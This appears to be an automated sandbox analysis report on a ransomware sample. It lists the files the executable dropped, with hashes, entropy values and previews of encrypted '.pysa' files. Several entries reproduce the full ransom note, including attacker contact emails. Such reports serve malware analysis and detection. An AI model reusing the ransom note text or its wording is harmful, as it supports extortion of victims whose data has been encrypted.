                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6929
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:C0A9D03A4B3295C87645F029304DD87A
                  SHA1:6D8C6048A086BE6AA2AC9EB4BC43DE151A558915
                  SHA-256:356018D7702D459465C1052494D62047F2BBA391EE1C9BC8C989715687FB59AF
                  SHA-512:79C334E2AFDC8C976310B4E8D891A61EAFB16E225BF7E3EA65742F88490AE870003F1B7F37565D874B8ED0FBE14FF005C81AFD893C073F9C4E56D2325D0F9102
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\SoftwareDistribution\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\USOPrivate\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\USOPrivate\UpdateStore\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\USOPrivate\UpdateStore\updatestore4df22196-a1f2-426c-aa27-062a9f86aba6.xml.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.788681106808847
                  Encrypted:false
                  SSDEEP:48:3KyIy528jSkRelJWdIVbSeV8OXmgC+n+ZfStm3sqeNczzq5KQ/BIdF7LYNXZTxZ0:awUQePWd4+e1XlSNwc/q0Qm7cvlSWc
                  MD5:9B141CF15F5AFC5F3D89E7B8E7312D4E
                  SHA1:D469A5FD61BC715B3587BD22DB3926F3B43CD13C
                  SHA-256:AC233F7A2D952FB4278587A0BE4160351A596ADDCEF13B62A4B0758143E95ED9
                  SHA-512:308BE01EE5CDE50792AB0E8FAF8DB439E759C5ECDD9383CF178FD1117109BE3AF2B5CAD33ED2DEECFF80C63CAA325BFEB52F8A1319D67D662339079A8EE767D2
                  Malicious:false
                  Preview: .:8u..=.M.A...nC.B..z..I....$.H...hg.o ...r..W...y.Y.../.D..$..|..j........Y..h ...U.dTGA..}4.....u.}.h).n.r...d........vq.I,...m..h.C"H.g*H....md.<%Pc....ci...f!Z........G...&.v....T...y..q.........2UY..=/..+;.~..yzZ'..mDs.. X....2.~.%TD..`..0Q.....Qa....h.........<F5NR72@.B..<Q...@CJ.9t..H.:|;:...*..>,.(a`../~.P..%=k.*Vs..Xy.+..xY.......0..-.a......A.jn|.rj...._.'.^..J.W....x...^.J.._<...x..ygcCqD.6......C.y..]......Ia....".i.%L=..!.%......ci^)W.B/d..4...A.4...pM*.I.......Ef..S[..$6s...bR.fb.*....'d...6Ep....)'.4..OmI=f.l5...J}...z.\..aO......"...^.m..c.....=.T.7..lU..5..3......^;.`7.c..f,:..:i.u....).....D.Z.....G...vVE.,..I*..!..mk.<.7._..t0..Y..[L.......-t.J..{.t.....0.6G..=E.....U..y.akv.V..@P)rR[..>.*c...Z....n..o..y.u.v....i6/......+.2....4....+WDp...Q.&1%...J.B..:.Gt.~...O....(N..7.v...<oj.XBQ....1t...5.N.....<.....R...;q.G...T$[....7...J._....K&C..A."\..5b.B.|.e..@.....ddm>(fPtQ..3.2...@6[.\.S.../..!.....o%R.l...z?..7O.o
                  C:\ProgramData\USOPrivate\UpdateStore\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.792475686661291
                  Encrypted:false
                  SSDEEP:96:FgrXp124C3jKjQ8oP9/a3X5a2b39VtJnmHt3qK7:Ap124gK+P99E9VTwp
                  MD5:506384AAA6902DC517966D7324DD18DD
                  SHA1:4DE306A782493F7D452F276CCC7F61DC8F6EEF1E
                  SHA-256:4E0DD5397EBBD25D26CAA24A356A28040507049D15FD826EA8886E819529E48C
                  SHA-512:8C5C2BCF97DE69909F5C5D725EBA7C7301DBC901003FE1E49C87561BB4A3D55C9D3160DA947E8C760E2CA83387CAF01E6D1D4C0AB3E1A3061B9470C04ACCC6BB
                  Malicious:false
                  Preview: ....%..........4.yV..L},...J..l.J{.bK..t.J.ixm..s.y.=>........c... .j....](.....U.....'.e..U....Q..;%6.).>..H..C..3.A:.Z.B.....a|...\..t.'.....^. F$7u.r.....25...&S..j..3..P......5.^(... "....E.y)Q'W....e..~u....7.I....'..H....4I3...?.....`.J.o.Z..R.[e.c<k).@.R..f.!^.....]UJ#f9rT.s.t..Y.....&bZ.y.A...IWc..z..u2.3...m.C.q.o..:..e*!r...6)....n....$G8d..lI.?...;S.#4E.-.2[O..W.c*#...u....,..l..*..b.:I~..PJ.Q.q..~.Z........P.....On.|.E..E......%.Z]..I_G..i ..;.>...#...u..I..Q,L.9...X..h..<....10w3....M`.L.H.g.Q}.:.\..r..Ay.J.K..+..q.?.......-..SJ..X.%]....:!..3..{.... .WG..Tzp.7.Q".>...l..o....B7....f..:9n.K..n.....f>tu.^=...o.Y.......t#U.#<~..$..u6?.".(cg......P..,.N.,.Q.........(.......2...X./8....O.5l...8......&....N-.K.h~.K7..H`.........?..a[=.]...Z1......u..Zy..d...cnl%...k9.S.i.`J.......I.[..O.....2.f..;......T%<R..&.F.M..8.06B.g3...]p@7.....T..@.q5r...Q.._..`.eSm.Se..L.G....m4...$d.rU..f..=..C.y..G..*........=.B8..B.....wC..:<X.I..[.....b.?..=..T..
                  C:\ProgramData\USOShared\Logs\NotifyIcon.001.etl.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.675287621696691
                  Encrypted:false
                  SSDEEP:192:w6EH8qVXMTHRtDiKalHw6V22eJb1FmjRk3XzLZ6sUIKjsHfqymr:TE2TxEDBw6VuJbTm1dsUBjUqPr
                  MD5:DAB4D058F1FC78E9E617D68D158888DC
                  SHA1:8F6D9A45694E240F922DE97DB2CBCCA5B663B187
                  SHA-256:7C9F4BDDF88305D5BC3B54783C6DF3387F3F7DAD285E882C7DED367486F89780
                  SHA-512:6DEA4BFE2F9B988B74CD3A6162004EBE58A3C9716479996834C8590FA198117A6153CA49A24A24200FA8A1963A451CBCC833A2602B0F09B31E2E4F99F6EFAE19
                  Malicious:false
                  Preview: .....}LgHv......W.....6D..f3V./:[cl.....:..?=lx.f.Gqx..H.~..k.R........."Q.9O.Dc...!.V..i..Oi!^CL.}...\.hFt.{o.QU..3j..0>..........3A.I....._3...gu......@H.....Q"*.".g.._7...+.....?.....M....PL.l...j]......].&g"....;....w.....4..5...t..yT........34......"Mb^..B....z.h...:.2...%..U.q{.....9G..C4r....am....|.a..7..q?7.=%u!.[T0.g\<k...'..I...2.RTO......|.#\.a...W.F.j..}....[p.....8....),...).......5.# .Q...O`)......M..g...g!l...Xl.oS.Y.m.+.~p$.(.Y&#...o.s.s..RR...S.t.....dL7..5..0`..7....<q......|..@HB..$6..j/q..L....&..<. ._y.."\..g.Xw..i.5\c......=..D.S...e.*......Z.'.........|.>..8@I..~?..8...Ss...+...z..u....c..w.0h.c.....Xw....C..cx .4f..../8>.7.C...<.4....J.TC..W...aW....i..pD......6......_O.y9...IL...2....%eZ.n...T4PW.{0...7.>...r.-...Y.E.7U..Fp.....]..y......c.%.....'....H].8z.......5Z.;.....E.G..>..I..6.5,5......G..Z...$.oHt.4..&..;.r..y.Y.."{g.$?j..t.`..+.a..G..A...7.m.}...u..(%H.|m.......[,....}kw.$2O..\C...3<..#.y.6.>R.
                  C:\ProgramData\USOShared\Logs\NotifyIcon_Temp.1.etl.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.679625085630809
                  Encrypted:false
                  SSDEEP:192:G0r06kRLbYeI0dByaLGobPdyCFlIM7ff0Yg9BwTkLqkaMG:RrJkmeI0dcAGmzDf0Y4KkLo3
                  MD5:014160163B1EC283E7B7FCFF6021E251
                  SHA1:CA40A1593E318B5B0EBEC1F3057745DA2FE312CB
                  SHA-256:C4F55732A399EC3F53BCE461C65F618DB97C34B2DF1C5752F6586BD0AC3B7A5F
                  SHA-512:1B1B13B90E191E4BF13A22B104ED772B5EB4F101DE632EDC4C20277563A0EEDD553AD906F079ECBC7290A62B89196F748EA5133F34B92BD21D010B20B0702BF2
                  Malicious:false
                  Preview: .E....a.B[..z\+z;....D..:^..W.7.G.O.{......-..Y....wv... Q.h....1.`..q..h...2..b]Rz.-.qZ.V.@.H+_f.._M"[.P}....*.W..Z..)..._0.8d}.z}...U..A....*..v.g...f.>.#..s..QL.a.....4....e....#..{..^.;p6..]..4.[...D..f...Rd44..,.l...-d.Wm...%p1...9....\. .B.....$K...>......-.}...{.lg.=...9.)......q.h$..y^=.....m.Q+......\.i.Mb ...?L.........wl(.....18...^....7-...}!.E.!...y{...emw..T.......k..i........[.F.......B.R.^L ..S43p.s<..Lz...n.B(.k...... P...8c.F..Zq...[,6...V@H|F..:.........G... .E..g.*....W.;\m`.Fc:\.W...JP..w...LvaK..Q.|..............DR...x.sl...^%.......&]C.Q.'..#...Y.r,.=w.w...:.mR&9.b..].p.t+. {e.......H.'.p.Vg..Z.....(V/..d..........uq~.$..J.............+...\_.b.)+.y....H}K^....[s....5..Iz/.Cs...H...7..5.+,M2Q,F.....N....5.iB.....F..F;.T.....-..Y$t....andZ.}M...d ..oI..D.D?g;.O....u...[.Fr$d..v.......(...{.`.d.9x../|..O..a.:|.:.fM.]&V.+..|.~^......94.J...D.....\@.....H P.=J..@o<...yVb.>..1.....8*. =6.u..I..!j.r6..........f...2-...
                  C:\ProgramData\USOShared\Logs\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.001.etl.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):21504
                  Entropy (8bit):7.91980606646942
                  Encrypted:false
                  SSDEEP:384:KH/5u9uxyH1aLAPlfPDhw5JGHLE6JYE6JKafhVtGwndA7Tf:qBY/GAt3Dhwig06waflGwndwf
                  MD5:DD9307DC182597AB498901C1B8170A58
                  SHA1:F2F0526305D7F2F1283EF58DDFD3E3B866930657
                  SHA-256:9FB4E7DFE0690DDC18EC15219E8D605CE331B77E376B9593A7692FD479C927FA
                  SHA-512:4EF47F0E9B2225DFF3DBEC87B7718ABF627D15C391FEE4A3581C7F0BBEE28A10678406EF2E49F2BD8803F51A1ACD236FF720E1A7D7847D66374167BFE9233AF7
                  Malicious:false
                  Preview: .-.....S...jn.>I./...ZbA.S...N=.6.r...l...Q.%,7."].a~..y..Z.....)..w7..$..:..F}...6.A..^...zAX!...[>.D..a.e.Kp.w..;.ER(....z....D25...........?1$.0#...w*...t6i...3..Uo..\...6...p..]m...n8...d#..L.7...ng.:k..3..1...kH......d.?..B..\Q.r~<.Sw...A...Q>..V.n..\..x.{a..EhT.'jtQY.....hL$.,.u.@..RR4.....l.p(......M|.s...x.%2]m.4.x........O..8......V=.~W..m..%.4......mn<.b`.z..V.n.L....33~.>.._..e..Lat..D.....}+....c..o.$w..g.m2}.G..Xy...y.j.K....fz....y......5....4.%.l|..LZN..'...=.t.....-....W.#'<M....#.DC.....{.}.....1U.:|.63J.......1.R,.[0.z..RRX.G../cDV..92..T...>....C3....g.I.,;q... j..ps.L.-...i`...#X40...L/9...c.|...bW.o-.a......ok.Sa..(C...h."....%.....+.v...j.>(.....o..q..1..:.0.#.z..}....g..E..........@6.p...N^6`.I....v...*.K7).)........>.5=<.n.\..."..zLS...X.Q=91:.@..>..L...$...mP...F.......6Z%.]...i.q..b.{...d.}...o...6.?......OX.5....%a..].1..0..7...xJ..8.y..;.m,q..u..C.J.(g.._\G...E. .b.O.w%j....<{..q..g..A3Vx.G.........!......L.g..S'...
                  C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.002.etl.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.671570386034094
                  Encrypted:false
                  SSDEEP:192:WHWQdiK/7W1ITgBMFZ+yDtrHcEcnc+vdb1cSWmMGz3:sWY/7W1ITWMFRtLLp+vimRz3
                  MD5:02BD6FC7816285C6FBBC2E29200F499A
                  SHA1:F62720EF8C9EA26B7CC37E8340609C273CA962B0
                  SHA-256:A9A4A149530DD64C796D1B5C8CE2E33EB960FCEFBD3B1539DFA8BB464ECF78CF
                  SHA-512:CA38F1B0AB10188280F2FD8890C3250ECE1D1D273349812FCC6125E3E094759C6714DDB1B740DF711327953770FB3A0148C65F47955DDF8250C4E25D7DB6DA24
                  Malicious:false
                  Preview: ...p..K?.z.Vi..`F.?_..X..d."..%.".u.1yU.!..\b....._.ykt..b...d+92F..?by..r=]..[..L.RJ..J.......C.a.....n..e.vT&..I...6:N.;...gr_..K.p....=...1....\}<c...n.:]t5..a.M.ocva....Fc.....*.0=...|.W.9..7oB.DO.....M.sD../.v/CO..3...W.....x.v..+.+H8..h.7[.x....IE:. ......`.Z..S....x......q...7...M.Q-..I./#O.9.:l[g.X.n.%..!x...".........XV.hV..=..q.....y.'V.5C.f...+F. ..E.....1.@.y.:.._Du......!K..a..mq.V.V.b.....M....uDaI..U.>.$..1....?..M..Fk.W._|*.....6C...55O......K..;.NZL.........i..pc.....H..$...o.'=....v.....q,.......dr........S;/..t."H..6}......!."........\.B...?........)]}........b2k......./.....6>..".b..ha.,.^..2.b7.n.l.K]F.*Ef.;.0..]js.aa.D..,>..8....Tf.$Vk.....)..|AQ...D.....M...%.PFu.g`..b{.....|.5.Vn-..~\...2\3.dK....-.6....l!C..7........F.^)..c.2..K..J........t_{2.....r.]..~IG7J......m.' /$9.|v46.D.X&3..@#@j....7!..<..s..D...O....<5$.P/u..]."......6....LN..3M.)...B..L)......l..C...P..)zF.).B..j.#y^...<.....E...C...8.f(.^....u.K..nS..J....`W.L.8D,.s.
                  C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.003.etl.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):7.135505701498303
                  Encrypted:false
                  SSDEEP:96:eg8xBGtJVNFp4wbZ5r6QP0FO1qrvtVIFK051BKR2+gE6B99rX:Bg2p4wr1kOkrvtVI872
                  MD5:7D8D529967EEF95F1DA5D6B7ED13C9AA
                  SHA1:6EE07E6895B3BB1751225F180F647FBB2C2444F5
                  SHA-256:3B02A024C683D73BCD244F3A217650B6F18E50AC93BA5F3BB18E194FF9C4DFA3
                  SHA-512:7E052EBAA180F3D0A618A986CB313BEC06E921DEA55F9D83DBE189B1703B7101293C4D5FFAE0562CEC939308C082D5F51B896C275C50EEC7F5030BBA2CCF86AF
                  Malicious:false
                  Preview: .4.......;.&..........#......;......[..q.fr(.g..`4.d,....Gn&..!.K\@.Ni......n...L.W.r..P..U.....G.8a.0"..L6%/y*S...T.;e.n...}UR.....2.{G..?..|$g.+Hw..'...Pu...X...v".....u......3.....u........b..zZ..o.m-...\.l.Hq...3...~[.@.-..Z.......;.N..<.@..y..-.p.....l..J.R....|.K.&v...Tr..(._j.]..5].c.<.(.*...Y..c.{,.. a...Vj.my._.yHL.....Q......,A..<...M.Y.....XF.X!..wI.D...s....0qZ.....Av..,..f.+..&N*.L..i...q.Y..:..I|ocA.C.S.....D..:./'....v....3o..%....9...5.r...2...B....6iC...N.{a.Z.MT........./.......!..d.6......G...v..=k0.....".|.....Vdp/..z..y.K:L.r...{.D=m.F...(..?.=.@....".;;..t.^...8...i..}......Hr.1.V2..f...#\..3.N4q{....//..;?-...~U.(...L..}i!j..q2...t`..j....K....V.[.w`..y.y.eHV.!O......r.....=.+{.t.;.-..s....+.Ty._.".....(..`;.D..._z..2........l...^u.h7.7.. .]...}..4..$.Rx.i:0.....YBn.$1...$o]...."..=...bU.-.s.JL..>.x.ce..I.D...Y..m7.Ar.P.e.(.._v...<.A:.q..1D..$=...b.....1l$)u~.JOG..`~..{..T.......d-b.....5w.|.`...{...q..NJ..
                  C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.004.etl.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):7.150274417956063
                  Encrypted:false
                  SSDEEP:96:9xM1wnkwHzbi7vGT2tE699TdDNaQ0bLFtQGO262XrpAJOymUz/t35ba:Y1sBi7vGTEE69Vdzav6tmUz1Za
                  MD5:CDF4E269B285ECE2B78F0B31256B55B4
                  SHA1:E200BFD6130C20E8D7947F61AAB2F84016265B39
                  SHA-256:F982CDDAECD9FEA5E8677EDE86A51A355613A485AC7160BD3D513789C710A4C7
                  SHA-512:629A3262FA77D52ECF7680E92F9EA5C3486A44D5B4CA1840B16D7EB29C5552312A399872658D532F4716A961A3E0356E3612B823D98BF37C909F07C2EEAB19F2
                  Malicious:false
                  Preview: .pPK...3..........&M....8XIm.U.......a.u)h.lc...g.o&^zn..cw.i..._...Z.b.S..8=.....j).(.&..R ...#..f.Z'r....T.$...Ud.d.b?;.....V.P.X..`..Q......}.....S`...3"\.zBd.#.............K.%P*...5......%W'...d..W5.A.q|I8C.[.d..jK..jf......:..../vm.X...e..._..{)M.6.Ac3w.^.......:....:.{.%.Di....@..t@.e*.....X.[#MQ.. ....\....|4...]`.3U"$DN"e1...q...B.......H..J.$.....N.*.E...`...a)....Yf._.U.rn......'...C....V.,.)2.'.,.d.....G....b..^.......]...b.\.[..M....R.eM...a`U....e.c(..u....._...f..2...[.e...7.TN.{...oN...CS...,.."^..hC.o..H..(W\.-..!{..N..p.i\.qq5[....,...H...`..V..#..g.../AL0.lB.|n~.F...;-\.o.i.bk<B..;7Pje.z@.<...D.>.q.z..VJ...... M...`IU...&G.....C..:..j..K.....,'....s....R...#..."....cF-.3.x..[uv4..v.!~...X...D.=.s.hi..6n.9|3m1.cN..,.....2...j..).$.D..g...U....x}.q....wr.q......6L...>...x.......fm0....;6vUl...#..cR....'.]<...7._......FX......X..M7..%6f....1&...?\..O....k.S..}(....N...3nM..\h.C....A..v9.5..Ai...o....}S2.y..B........
                  C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.005.etl.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):21504
                  Entropy (8bit):7.920979450538144
                  Encrypted:false
                  SSDEEP:384:U8yi2tDSzrx54MqZ0DUNRv0Ttj4R/zxBNJJnYdimwQ/YsCDPGBUDKK7maWjH4CNP:aiUm/x54MqNZOaZxBNTnHw/YsCDPGBMs
                  MD5:945ED615C1E7DAF61C726991176D6B2D
                  SHA1:FCD838EB2A6A7614D6195176F7513F7DB8539C46
                  SHA-256:F938F0A2EEE0ADCA6B74B88D122D67F7D1114406E3198F87C1FB2DF91AA3AA28
                  SHA-512:73ECF2A75267F3D8BCE7760FA7367B5BF00B9BABFB7E7C3EBE46827E77F22CEAB24630F2D3427CE46102D127E31F7DE337B55B860A493FDAAB54ABA19907433B
                  Malicious:false
                  Preview: ....^.z.8.>.o.h,..)...o.....UF......F."..r..;...xQB.x..`g,...(..R.5....C.\(.hh.v.v.#.b!..h).....{.......O..O........%.o~.l..3.$m.eoT1....1..t.2.{...z.A.3Z%.b......Y.O.....R..D....1/...IS....b.1.[.0....7......z.O..2..|w.....e'...YQ...WT|....L.....U..e@nd...4..h..Z...!.l.T.o.1.p.....#k....0.....zr....&B3]...$.cGlq......7...]....._..<.M.].Y.$..C.E..<tF..:.v....Z.lD..y.......9.j.!.......0...~.An.-......*.=...k.o.5..@r..O..uP'....*..1....M.ND./...l..d<C....I.YV...R1.W.....21....Z.B..\z..[....s..T...bP..5.N.......c........Z...o.q.2..J.c/o...x799f...k....lu.`{..Ao.t=Wm...g.n.i."TX..k.........?.mhtJLb:.......`..O..)...+[....q.....6..=.L..._.r..3;Ap..*.t...GIv.r.A;i....JpV.\..J}..(.O.}....hh..g.~..Q...;P>..../.U..h..0D.&S....Y.w}..[..m..5.....Z....d.....X.Mnq....8wS...}G.@n;....cr...7.T........)W....R....4...Fdc.i.J..k=.I..g.........H..F..[.Q.V...:.X..-..S...v..&'.-9...L..&l.z.4..K. b."...z35.\..d:xK.M.r_.s......;Y.e...8Z.....7.t.$sG6p..)
                  C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.006.etl.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):7.1708977650959564
                  Encrypted:false
                  SSDEEP:96:vawWnd0GJs0uXMsuK4197HEwNDuhktraFuikRVn+Kl5t+JZa:vald7JFwMsM197HNVuhcraFu+KJ+JZa
                  MD5:9C0383B086B92C59AB1E6E486A289D99
                  SHA1:3634B24CACC4EFA64FE363E309FB09B5EE256414
                  SHA-256:B70C76C906F927F0CA012384CC77D16B97EA47F0C20C05DBC2CED10C566DC077
                  SHA-512:32152BCA1669B6F24F0DEEEF113C34FE19A2B5C1E453CB92C1C38517FAFFCAA5F1D26DD7F3FBC8DE366ECC37D5CCBC9100BE127FE99049BA615CCF6BC154B366
                  Malicious:false
